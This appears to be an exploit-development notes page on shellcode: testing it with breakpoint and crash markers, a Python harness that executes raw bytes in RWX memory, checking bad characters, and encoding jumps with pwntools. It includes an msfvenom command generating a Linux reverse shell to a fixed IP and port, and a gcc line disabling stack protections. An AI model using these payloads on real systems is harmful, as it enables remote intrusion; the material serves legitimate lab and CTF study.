# Shellcode

## Common Problems

### Don’t Send Data Too Fast

Take into account that sending data too fast might lead to unexpected results, especially in applications that were designed around slow human input and read their input in several steps.

For example, I couldn’t get a segfault to occur in [Fusion 2](https://exploit.education/fusion/level02/). After I added 1-second sleeps between all the network traffic I sent, it started working 100% of the time.

### **Stack Alignment**

{% embed url="https://githubmemory.com/repo/Gallopsled/pwntools/issues/1870" %}
Reference to the problem
{% endembed %}

You might be required to align the stack to 8 or 16 bytes when doing ROP chains. If your exploit is working locally but not remotely, then this is one possible cause.

## Testing out shellcode

### **Breakpoint trick**

If you’re not sure whether your shellcode is being hit (for example in a regular execution environment without a debugger), you can place a `0xCC` byte (the `INT3` breakpoint instruction) in it. When that breakpoint is reached with no debugger attached, the process is killed by SIGTRAP and you get a message indicating that (Trace/breakpoint trap).

It won't end up in dmesg, though. If you want it to end up in dmesg, use something that causes a segfault instead, like `pwn.asm(pwn.shellcraft.i386.crash())` from pwntools. You can also use `pwn.asm(pwn.shellcraft.i386.infloop())` to create an infinite loop: the process hangs instead of exiting, which confirms that execution reached that point.

### Shellcode repository

{% embed url="http://shell-storm.org/shellcode/" %}

But really, using **msfvenom** to generate your own shellcode is better in pretty much every way.

#### **Test files**

Shellcode usually comes with a small C test file that copies the bytes into a buffer and jumps to them. You might need to supply additional options to gcc, such as making the stack executable (`-z execstack`), disabling the stack protector (`-fno-stack-protector`) and disabling PIE (`-no-pie`):

```
gcc test.c -o test -fno-stack-protector -z execstack -no-pie
```
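The same thing can be done from Python without a C test file and without reading dmesg. The harness below is an added example (not code from the original page, from pwntools or from shell-storm): it maps a writable and executable page, forks, runs the bytes in the child and reports the signal that ended it, so an `int3` shows up as SIGTRAP, a crash as SIGSEGV and an infinite loop as SIGALRM after a timeout. The four payloads are constructed samples whose encodings assume an x86 or x86-64 Linux host; `run_shellcode` and `host_is_x86` are names chosen here.

```python
import ctypes
import mmap
import os
import platform
import signal

# Constructed sample payloads (x86 / x86-64 encodings), not taken from any repository:
INT3 = b"\xcc"                    # int3            -> SIGTRAP ("Trace/breakpoint trap")
NULL_DEREF = b"\x31\xc0\x8b\x00"  # xor eax,eax ; mov eax,[eax] -> SIGSEGV (and a dmesg line)
INFLOOP = b"\xeb\xfe"             # jmp $           -> never returns, killed by the alarm
CLEAN_RET = b"\xc3"               # ret             -> returns to the caller normally


def host_is_x86() -> bool:
    """The sample encodings above only make sense on an x86-family CPU."""
    return platform.machine().lower() in ("x86_64", "amd64", "i386", "i686")


def run_shellcode(code: bytes, timeout_s: int = 2) -> str:
    """Run `code` in a forked child and describe how the child ended.

    Returns "killed by SIGxxx" when a signal terminated the child, or
    "exited N" when the payload returned and the child exited normally.
    """
    pid = os.fork()
    if pid == 0:  # child: everything here is sacrificial
        try:
            # Anonymous RWX mapping, at least one page long.
            buf = mmap.mmap(-1, max(len(code), mmap.PAGESIZE),
                            prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
            buf.write(code)
            addr = ctypes.addressof(ctypes.c_char.from_buffer(buf))
            entry = ctypes.CFUNCTYPE(None)(addr)  # treat the buffer as a void f(void)
            signal.alarm(timeout_s)               # SIGALRM ends a payload that hangs
            entry()
        except Exception:
            os._exit(111)  # could not even set the mapping up
        os._exit(0)        # payload returned cleanly

    _, status = os.waitpid(pid, 0)
    if os.WIFSIGNALED(status):
        return "killed by " + signal.Signals(os.WTERMSIG(status)).name
    return "exited %d" % os.WEXITSTATUS(status)


if __name__ == "__main__":
    for name, payload in [("int3", INT3), ("null deref", NULL_DEREF),
                          ("infloop", INFLOOP), ("ret", CLEAN_RET)]:
        print("%-10s -> %s" % (name, run_shellcode(payload, timeout_s=1)))
```

Because the child is a throwaway process, a hung or crashing payload never takes the harness down with it, and the reported signal tells you which of the three markers from the breakpoint trick was reached.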

## Generating Shellcode

### **Generating shellcode with msfvenom**

You can generate shellcode for a reverse shell using msfvenom.

This is an example of an x86 Linux reverse shell, which will connect back to 172.16.184.1 on port 8000. The output format is set to Python, so you can paste it straight into a Python script.

```
msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.184.1 LPORT=8000 -a x86 --platform linux -f python
```

You can also specify bad characters: bytes that the shellcode must not contain (like NULL bytes or backslashes), which msfvenom then avoids when encoding. This is useful if the vulnerable input path has certain limitations.
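Before pasting the Python-format output into a script it is worth checking it against the bad characters yourself, since a single stray byte will truncate or corrupt the payload in the target. The following added example (not msfvenom's code) parses the `buf += b"\x.."` layout back into bytes and reports every offending byte with its offset. The sample text is constructed to mimic that layout and is not real msfvenom output; `parse_python_format` and `find_bad_chars` are names chosen here.

```python
import re

# Constructed stand-in for msfvenom's `-f python` layout (NOT real msfvenom output):
# two nops, an int3, a deliberate NULL byte, a backslash byte, a nop and a ret.
SAMPLE_PYTHON_FORMAT = '''buf =  b""
buf += b"\\x90\\x90\\xcc\\x00"
buf += b"\\x5c\\x90\\xc3"
'''

# One b"..." literal made only of \xNN escapes, the form msfvenom emits.
_LITERAL = re.compile(r'b"((?:\\x[0-9a-fA-F]{2})*)"')


def parse_python_format(text: str) -> bytes:
    """Collect the bytes of every b"\\x.." literal in `text`, in order."""
    out = bytearray()
    for hexrun in _LITERAL.findall(text):
        out += bytes.fromhex(hexrun.replace("\\x", ""))
    return bytes(out)


def find_bad_chars(code: bytes, bad: bytes) -> list:
    """Return (offset, value) for every byte of `code` that is in `bad`."""
    return [(i, b) for i, b in enumerate(code) if b in bad]


if __name__ == "__main__":
    code = parse_python_format(SAMPLE_PYTHON_FORMAT)
    print("%d bytes parsed" % len(code))
    for offset, value in find_bad_chars(code, b"\x00\x5c"):
        print("bad byte 0x%02x at offset %d" % (value, offset))
```

If the check reports anything, re-run msfvenom with those bytes listed as bad characters rather than patching the output by hand.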

### **Generating Assembly Using Pwntools**

{% embed url="https://docs.pwntools.com/en/stable/asm.html" %}
Documentation
{% endembed %}

You can use pwntools to generate the machine code for whatever assembly you want to execute. For example, here is the syntax for doing relative jumps in pwntools on the command line:

```
pwn asm 'jmp $+0x20'
```

And this is how you can do it in Python code:

```
>>> import pwn
>>> pwn.asm('jmp $+0x20')
b'\xeb\x1e'
```
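The `\xeb\x1e` above is worth understanding rather than memorising: the displacement of a relative jump is measured from the end of the instruction, so `jmp $+0x20` encoded as the 2-byte short form becomes `EB` followed by `0x20 - 2 = 0x1e`. The added example below (not pwntools code) generalises this to any x86/x86-64 target, choosing the short `EB rel8` form when the displacement fits in a signed byte and the 5-byte `E9 rel32` form otherwise, and decodes the result back to check it; `encode_jmp` and `decode_jmp` are names chosen here.

```python
def encode_jmp(at: int, target: int) -> bytes:
    """Encode `jmp target` for an instruction located at offset `at`.

    Short form EB rel8 is used when the displacement fits a signed byte,
    otherwise the near form E9 rel32. Both displacements are relative to
    the address of the *next* instruction, i.e. `at + instruction length`.
    """
    rel8 = target - (at + 2)
    if -128 <= rel8 <= 127:
        return b"\xeb" + rel8.to_bytes(1, "little", signed=True)
    rel32 = target - (at + 5)
    if not -2**31 <= rel32 < 2**31:
        raise ValueError("target is out of rel32 range")
    return b"\xe9" + rel32.to_bytes(4, "little", signed=True)


def decode_jmp(code: bytes, at: int = 0) -> int:
    """Return the absolute target of the EB/E9 jump at the start of `code`."""
    if code[0] == 0xEB:
        return at + 2 + int.from_bytes(code[1:2], "little", signed=True)
    if code[0] == 0xE9:
        return at + 5 + int.from_bytes(code[1:5], "little", signed=True)
    raise ValueError("not a relative jmp")


if __name__ == "__main__":
    # Matches `pwn asm 'jmp $+0x20'` -> eb 1e
    print(encode_jmp(0, 0x20).hex())
    # A jump to itself is the infinite-loop marker: eb fe
    print(encode_jmp(0, 0).hex())
    # Backward and far jumps, round-tripped through the decoder
    for at, target in [(0x10, 0x0), (0x1000, 0x5000), (0x5000, 0x1000)]:
        code = encode_jmp(at, target)
        print("%#x -> %#x : %s (decodes to %#x)" % (at, target, code.hex(), decode_jmp(code, at)))
```

The round trip through `decode_jmp` is the same check you would do with `pwn disasm` on a hand-patched jump: if the decoded target is not the one you intended, the displacement was computed from the wrong base.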
